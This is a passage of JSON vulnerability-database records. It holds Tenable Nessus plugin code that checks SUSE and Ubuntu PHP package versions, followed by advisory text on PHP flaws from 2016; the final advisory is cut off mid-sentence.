(rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-curl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-dba-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-dom-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-exif-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-fastcgi-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-fileinfo-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ftp-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gd-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gettext-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gmp-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-iconv-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-intl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-json-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ldap-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mbstring-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mcrypt-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mysql-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-odbc-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-openssl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pcntl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pdo-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pear-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pgsql-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pspell-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-shmop-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-snmp-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-soap-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-suhosin-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvmsg-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvsem-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvshm-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-tokenizer-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-wddx-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlreader-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlrpc-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlwriter-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xsl-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-zip-5.3.17-84.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-zlib-5.3.17-84.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:10:55", "description": "Taoguang Chen discovered that PHP incorrectly handled certain invalid objects when unserializing data. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-7124)\n\nTaoguang Chen discovered that PHP incorrectly handled invalid session names. A remote attacker could use this issue to inject arbitrary session data. (CVE-2016-7125)\n\nIt was discovered that PHP incorrectly handled certain gamma values in the imagegammacorrect function. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-7127)\n\nIt was discovered that PHP incorrectly handled certain crafted TIFF image thumbnails. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly expose sensitive information. (CVE-2016-7128)\n\nIt was discovered that PHP incorrectly handled unserializing certain wddxPacket XML documents. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-7129, CVE-2016-7130, CVE-2016-7131, CVE-2016-7132, CVE-2016-7413)\n\nIt was discovered that PHP incorrectly handled certain memory operations. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 16.04 LTS. (CVE-2016-7133)\n\nIt was discovered that PHP incorrectly handled long strings in curl_escape calls. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 16.04 LTS.\n(CVE-2016-7134)\n\nTaoguang Chen discovered that PHP incorrectly handled certain failures when unserializing data. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2016-7411)\n\nIt was discovered that PHP incorrectly handled certain flags in the MySQL driver. Malicious remote MySQL servers could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-7412)\n\nIt was discovered that PHP incorrectly handled ZIP file signature verification when processing a PHAR archive. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-7414)\n\nIt was discovered that PHP incorrectly handled certain locale operations. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-7416)\n\nIt was discovered that PHP incorrectly handled SplArray unserializing.\nA remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2016-7417)\n\nKe Liu discovered that PHP incorrectly handled unserializing wddxPacket XML documents with incorrect boolean elements. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2016-7418).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-10-05T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : php5, php7.0 vulnerabilities (USN-3095-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7127", "CVE-2016-7128", "CVE-2016-7129", "CVE-2016-7130", "CVE-2016-7131", "CVE-2016-7132", "CVE-2016-7133", "CVE-2016-7134", "CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php7.0", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-curl", "p-cpe:/a:canonical:ubuntu_linux:php5-fpm", "p-cpe:/a:canonical:ubuntu_linux:php5-gd", "p-cpe:/a:canonical:ubuntu_linux:php5-mysqlnd", "p-cpe:/a:canonical:ubuntu_linux:php7.0-cgi", "p-cpe:/a:canonical:ubuntu_linux:php7.0-cli", "p-cpe:/a:canonical:ubuntu_linux:php7.0-curl", "p-cpe:/a:canonical:ubuntu_linux:php7.0-fpm", "p-cpe:/a:canonical:ubuntu_linux:php7.0-gd", "p-cpe:/a:canonical:ubuntu_linux:php7.0-mysql", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3095-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3095-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93864);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7127\", \"CVE-2016-7128\", \"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\", \"CVE-2016-7132\", \"CVE-2016-7133\", \"CVE-2016-7134\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_xref(name:\"USN\", value:\"3095-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : php5, php7.0 vulnerabilities (USN-3095-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Taoguang Chen discovered that PHP incorrectly handled certain invalid\nobjects when unserializing data. A remote attacker could use this\nissue to cause PHP to crash, resulting in a denial of service, or\npossibly execute arbitrary code. (CVE-2016-7124)\n\nTaoguang Chen discovered that PHP incorrectly handled invalid session\nnames. A remote attacker could use this issue to inject arbitrary\nsession data. (CVE-2016-7125)\n\nIt was discovered that PHP incorrectly handled certain gamma values in\nthe imagegammacorrect function. A remote attacker could use this issue\nto cause PHP to crash, resulting in a denial of service, or possibly\nexecute arbitrary code. (CVE-2016-7127)\n\nIt was discovered that PHP incorrectly handled certain crafted TIFF\nimage thumbnails. A remote attacker could use this issue to cause PHP\nto crash, resulting in a denial of service, or possibly expose\nsensitive information. (CVE-2016-7128)\n\nIt was discovered that PHP incorrectly handled unserializing certain\nwddxPacket XML documents. A remote attacker could use this issue to\ncause PHP to crash, resulting in a denial of service, or possibly\nexecute arbitrary code. (CVE-2016-7129, CVE-2016-7130, CVE-2016-7131,\nCVE-2016-7132, CVE-2016-7413)\n\nIt was discovered that PHP incorrectly handled certain memory\noperations. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 16.04 LTS. (CVE-2016-7133)\n\nIt was discovered that PHP incorrectly handled long strings in\ncurl_escape calls. A remote attacker could use this issue to cause PHP\nto crash, resulting in a denial of service, or possibly execute\narbitrary code. This issue only affected Ubuntu 16.04 LTS.\n(CVE-2016-7134)\n\nTaoguang Chen discovered that PHP incorrectly handled certain failures\nwhen unserializing data. A remote attacker could use this issue to\ncause PHP to crash, resulting in a denial of service, or possibly\nexecute arbitrary code. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2016-7411)\n\nIt was discovered that PHP incorrectly handled certain flags in the\nMySQL driver. Malicious remote MySQL servers could use this issue to\ncause PHP to crash, resulting in a denial of service, or possibly\nexecute arbitrary code. (CVE-2016-7412)\n\nIt was discovered that PHP incorrectly handled ZIP file signature\nverification when processing a PHAR archive. A remote attacker could\nuse this issue to cause PHP to crash, resulting in a denial of\nservice, or possibly execute arbitrary code. (CVE-2016-7414)\n\nIt was discovered that PHP incorrectly handled certain locale\noperations. A remote attacker could use this issue to cause PHP to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. (CVE-2016-7416)\n\nIt was discovered that PHP incorrectly handled SplArray unserializing.\nA remote attacker could use this issue to cause PHP to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2016-7417)\n\nKe Liu discovered that PHP incorrectly handled unserializing\nwddxPacket XML documents with incorrect boolean elements. A remote\nattacker could use this issue to cause PHP to crash, resulting in a\ndenial of service, or possibly execute arbitrary code. (CVE-2016-7418).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3095-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.10-1ubuntu3.25\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.10-1ubuntu3.25\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-cli\", pkgver:\"5.3.10-1ubuntu3.25\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-curl\", pkgver:\"5.3.10-1ubuntu3.25\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-fpm\", pkgver:\"5.3.10-1ubuntu3.25\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-gd\", pkgver:\"5.3.10-1ubuntu3.25\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"php5-mysqlnd\", pkgver:\"5.3.10-1ubuntu3.25\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.5.9+dfsg-1ubuntu4.20\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cgi\", pkgver:\"5.5.9+dfsg-1ubuntu4.20\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cli\", pkgver:\"5.5.9+dfsg-1ubuntu4.20\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-curl\", pkgver:\"5.5.9+dfsg-1ubuntu4.20\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-fpm\", pkgver:\"5.5.9+dfsg-1ubuntu4.20\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-gd\", pkgver:\"5.5.9+dfsg-1ubuntu4.20\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-mysqlnd\", pkgver:\"5.5.9+dfsg-1ubuntu4.20\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libapache2-mod-php7.0\", pkgver:\"7.0.8-0ubuntu0.16.04.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-cgi\", pkgver:\"7.0.8-0ubuntu0.16.04.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-cli\", pkgver:\"7.0.8-0ubuntu0.16.04.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-curl\", pkgver:\"7.0.8-0ubuntu0.16.04.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-fpm\", pkgver:\"7.0.8-0ubuntu0.16.04.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-gd\", pkgver:\"7.0.8-0ubuntu0.16.04.3\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-mysql\", pkgver:\"7.0.8-0ubuntu0.16.04.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / libapache2-mod-php7.0 / php5-cgi / php5-cli / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:08:51", "description": "According to its self-reported version, the Tenable SecurityCenter application installed on the remote host is prior to 5.4.1. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in x509_vfy.c due to improper handling of certificate revocation lists (CRLs). An unauthenticated, remote attacker can exploit this, via a specially crafted CRL, to cause a NULL pointer dereference, resulting in a crash of the service. (CVE-2016-7052)\n\n - A cross-site scripting (XSS) vulnerability exists within the JQuery UI dialog() function due to improper validation of input to the 'closeText' parameter before returning it to users. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-7103)\n\n - A denial of service vulnerability exists in PHP within file ext/standard/var_unserializer.c due to improper handling of certain invalid objects. An unauthenticated, remote attacker can exploit this, via specially crafted serialized data that leads to a __destruct() or magic() function call, to cause a denial of service condition or potentially execute arbitrary code. (CVE-2016-7124)\n\n - A flaw exists in PHP in file ext/session/session.c when handling session names. An unauthenticated, remote attacker can exploit this to inject arbitrary data into sessions. (CVE-2016-7125)\n\n - An integer truncation error exists in PHP in the select_colors() function in file ext/gd/libgd/gd_topal.c when handling the number of colors. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in the execution of arbitrary code. (CVE-2016-7126)\n\n - An array-indexing error exists in PHP in the imagegammacorrect() function within file ext/gd/gd.c when handling negative gamma values. An unauthenticated, remote attacker can exploit this, by writing a NULL to an arbitrary memory location, to cause a crash or the execution of arbitrary code. (CVE-2016-7127)\n\n - A flaw exists in PHP in the exif_process_IFD_in_TIFF() function within file ext/exif/exif.c when handling TIFF image content. An unauthenticated, remote attacker can exploit this to disclose memory contents.\n (CVE-2016-7128)\n\n - A denial of service vulnerability exists in PHP in the php_wddx_process_data() function within file ext/wddx/wddx.c when deserializing invalid dateTime values. An unauthenticated, remote attacker can exploit this to cause a crash. (CVE-2016-7129)\n\n - A NULL pointer dereference flaw exists in PHP in the php_wddx_pop_element() function within file ext/wddx/wddx.c when handling Base64 binary values. An unauthenticated, remote attacker can exploit this to cause a denial of service condition. (CVE-2016-7130)\n\n - A NULL pointer dereference flaw exists in PHP in the php_wddx_deserialize_ex() function within file ext/wddx/wddx.c when handling invalid XML content. An unauthenticated, remote attacker can exploit this to cause a denial of service condition. (CVE-2016-7131)\n\n - A NULL pointer dereference flaw exists in PHP in the php_wddx_pop_element() function within file ext/wddx/wddx.c. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n (CVE-2016-7132)\n\n - A buffer overflow condition exists in PHP in file ext/mysqlnd/mysqlnd_wireprotocol.c within the php_mysqlnd_rowp_read_text_protocol_aux() function when handling the BIT field. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in a crash or the execution of arbitrary code. (CVE-2016-7412)\n\n - A use-after-free error exists in PHP in the wddx_stack_destroy() function within file ext/wddx/wddx.c when deserializing recordset elements.\n An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in PHP in the phar_parse_zipfile() function within file ext/phar/zip.c when handling the uncompressed file size. An unauthenticated, remote attacker can exploit this to have an unspecified impact. (CVE-2016-7414)\n\n - Multiple stack-based buffer overflow conditions exist in the International Components for Unicode for C/C++ (ICU4C) component in the msgfmt_format_message() function within file common/locid.cpp when handling locale strings. An unauthenticated, remote attacker can exploit these, via a long locale string, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-7415, CVE-2016-7416)\n\n - A flaw exists in PHP within file ext/spl/spl_array.c, specifically in the spl_array_get_dimension_ptr_ptr() function during the deserialization of SplArray, due to improper validation of types. An unauthenticated, remote attacker can exploit this to cause a crash or other unspecified impact. (CVE-2016-7417)\n\n - An out-of-bounds read error exists in PHP in the php_wddx_push_element() function within file ext/wddx/wddx.c. An unauthenticated, remote attacker can exploit this to cause a crash or the disclosure of memory contents. (CVE-2016-7418)\n\n - A use-after-free error exists in PHP within the unserialize() function in file ext/curl/curl_file.c. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-9137)\n\n - An integer overflow condition exists in PHP in the php_snmp_parse_oid() function in file ext/snmp/snmp.c.\n An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the sql_regcase() function within file ext/ereg/ereg.c when handling overly long strings. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the php_base64_encode() function within file ext/standard/base64.c when handling overly long strings. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the php_quot_print_encode() function within file ext/standard/quot_print.c when handling overly long strings. An unauthenticated, remote attacker can exploit this to cause a heap-based buffer overflow, resulting in the execution of arbitrary code.\n\n - A use-after-free error exists in PHP in the unserialize() function within file ext/standard/var.c.\n An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code.\n\n - A flaw exists in PHP in the php_ftp_fopen_connect() function within file ext/standard/ftp_fopen_wrapper.c due to silently downgrading to regular FTP even if a secure method has been requested. A man-in-the-middle (MitM) attacker can exploit this to downgrade the FTP communication.\n\n - An integer overflow condition exists in PHP in the php_url_encode() function within file ext/standard/url.c when handling overly long strings. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the php_uuencode() function in file ext/standard/uuencode.c.\n An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the bzdecompress() function within file ext/bz2/bz2.c. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the curl_escape() function within file ext/curl/interface.c when handling overly long escaped strings. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code.\n\n - An out-of-bounds access error exists in PHP in file ext/phar/tar.c, specifically in the phar_parse_tarfile() function during the verification of signatures. An unauthenticated, remote attacker can exploit this to have an unspecified impact.\n\n - A flaw exists in PHP when destroying deserialized objects due to improper validation of certain unspecified input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP within the fgetcsv() function due to improper validation of CSV field lengths. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the wordwrap() function within file ext/standard/string.c due to improper validation of certain unspecified input.\n An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the fgets() function within file ext/standard/file.c due to improper validation of certain unspecified input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in PHP in the xml_utf8_encode() function within file ext/xml/xml.c due to improper validation of certain unspecified input. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.\n\n - A flaw exists in PHP in the exif_process_IFD_in_TIFF() function within file ext/exif/exif.c when handling uninitialized thumbnail data. An unauthenticated, remote attacker can exploit this to disclose memory contents.\n\n - A flaw exists in PHP due to the parse_url() function returning the incorrect host. An unauthenticated, remote attacker can exploit this to bypass authentication or to conduct open redirection and server-side request forgery attacks, depending on how the function is implemented.\n\n - A NULL pointer dereference flaw exists in PHP in the SimpleXMLElement::asXML() function within file ext/simplexml/simplexml.c. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n\n - An heap buffer overflow condition exists in PHP in the php_ereg_replace() function within file ext/ereg/ereg.c due to improper validation of certain unspecified input.\n An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n\n - A flaw exists in PHP in file ext/openssl/openssl.c within the openssl_random_pseudo_bytes() function when handling strings larger than 2GB. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n\n - A flaw exists in PHP in the openssl_encrypt() function within file ext/openssl/openssl.c when handling strings larger than 2GB. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n\n - An integer overflow condition exists in PHP in the imap_8bit() function within file ext/imap/php_imap.c due to improper validation of certain unspecified input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of 